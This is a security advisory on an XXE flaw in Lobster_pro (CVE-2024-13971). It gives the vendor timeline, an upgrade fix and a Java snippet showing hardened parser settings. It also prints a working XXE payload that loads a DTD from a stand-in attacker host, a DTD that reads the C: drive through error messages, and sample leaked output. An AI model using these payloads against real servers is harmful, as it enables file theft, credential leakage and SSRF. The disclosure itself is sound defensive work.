
Advisory: Arbitrary File Read and Server Side Request Forgery via XML External Entities in Lobster_pro (CVE-2024-13971)

Release of SCHUTZWERK-SA-2024-005

April 30, 2026


Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.

Metadata

Details

During a recent red team engagement, the no-code platform Lobster_pro was identified as part of the customer’s internet-facing assets.

The endpoint https://<lobster-pro instance>:443/system/web was found to process XML via HTTP POST requests. Sending the following payload and observing the attacker-controlled web server confirms that XML External Entities (XXE) are followed and loaded by the application:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lbsterq [
         <!ENTITY % lobster SYSTEM "http://attacker.tld/map.dtd">
%lobster;
]>
<properties>lobster</properties>

Serving the following map.dtd file from that web server, it is possible to retrieve file contents, directory listings or HTTP responses via the error message returned by the endpoint:

<!ENTITY % cfga SYSTEM "file:///c:">
<!ENTITY % eea "<!ENTITY &#x25; lobsterdata SYSTEM '#%cfga;'>">
%eea;
%lobsterdata;

The HTTP response contains an error message, embedding the file content or directory listing:

<?xml version="1.0" encoding="UTF-8"?>
<core:ErrorResponse xmlns:core="CORESYSTEM">
   <errorInfo>
      <errorCode>500</errorCode>
      <httpResponseStatus>200</httpResponseStatus>
      <locale>en</locale>
      <errorText>javax.xml.bind.UnmarshalException
 - with linked exception:
[Exception [EclipseLink-25004] (Eclipse Persistence Services - 2.7.8.qualifier): org.eclipse.persistence.exceptions.XMLMarshalException&#xd;
Exception Description: An error occurred unmarshalling the document&#xd;
Internal Exception: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[4,10]
Message: no protocol: #$Recycle.Bin
Config.Msi
[...]
pagefile.sys
PerfLogs
ProgramData
Program Files
Program Files (x86)
Programme
[...]
temp
Users
Windows
]</errorText>
      <errorType>java.io.IOException</errorType>
      <errorLevel>1</errorLevel>
   </errorInfo>
</core:ErrorResponse>

Because the retrieved content is embedded in an entity declaration, files containing certain symbols (e.g., the percent sign %) produce recursive entity declarations and cannot be exfiltrated this way.
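The error message above shows that the endpoint parses the request with the JDK's StAX stack (javax.xml.stream) feeding a JAXB unmarshaller. The following Java snippet is an added illustration, not Lobster_pro's code: it shows the default XMLInputFactory configuration that processes DTDs and external entities next to the hardened configuration that refuses them, using a constructed copy of the advisory's payload with a placeholder DTD host. A reader built from the hardened factory can be handed to JAXB via Unmarshaller.unmarshal(XMLStreamReader) so the unmarshaller never sees a resolved entity.

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class XxeHardening {

    // Constructed sample in the shape of the advisory's payload; the DTD host is a placeholder.
    static final String PAYLOAD =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
      + "<!DOCTYPE lbsterq [\n"
      + "  <!ENTITY % lobster SYSTEM \"http://dtd-host.example/map.dtd\">\n"
      + "  %lobster;\n"
      + "]>\n"
      + "<properties>lobster</properties>";

    // Default factory: DTD processing and external entity resolution are enabled,
    // so the parameter entity above would be fetched and its declarations followed.
    static XMLInputFactory permissiveFactory() {
        return XMLInputFactory.newInstance();
    }

    // Hardened factory: no DTD processing and no external entity resolution.
    // Both properties are mandatory for every StAX implementation.
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return f;
    }

    // Reads the document with the given factory and returns its text content.
    static String textContent(XMLInputFactory f, String xml) throws XMLStreamException {
        XMLStreamReader r = f.createXMLStreamReader(new StringReader(xml));
        StringBuilder sb = new StringBuilder();
        while (r.hasNext()) {
            if (r.next() == XMLStreamConstants.CHARACTERS) sb.append(r.getText());
        }
        return sb.toString().trim();
    }

    public static void main(String[] args) {
        try {
            System.out.println("parsed: " + textContent(hardenedFactory(), PAYLOAD));
        } catch (XMLStreamException e) {
            // The JDK's built-in parser rejects the DOCTYPE outright when SUPPORT_DTD is false;
            // other implementations skip it. In neither case is the external entity fetched.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The contrast to watch for in code review is the first factory: any XMLInputFactory.newInstance() used without these two properties will resolve the external parameter entity exactly as the advisory describes.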

Risk

An attacker can use the vulnerability to gather information and, depending on the stored data, exfiltrate secrets from the file system and adjacent SMB shares. Furthermore, HTTP requests can be used for out-of-band exfiltration and server-side request forgery (SSRF) attacks. Utilizing the SMB protocol could also leak the NTLM hash of the application's service account.

Solution/Mitigation

Update to Lobster_pro release 4.12.6-GA or higher.

Timeline

  • 2024-08-12 Initial contact with vendor
  • 2024-08-14 Vulnerability reported to vendor
  • 2024-08-14 CVE ID requested
  • 2024-08-22 Initial feedback received from vendor: unable to reproduce
  • 2024-08-28 Vulnerability demonstrated in vendor’s “Community server”
  • 2024-09-19 Vulnerability reported fixed by vendor in Lobster_pro release 4.12.6-GA
  • 2025-07-03 Reserved CVE ID CVE-2024-13971
  • 2026-04-30 Advisory released

Credits

The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.

~ Marcelo Reyes
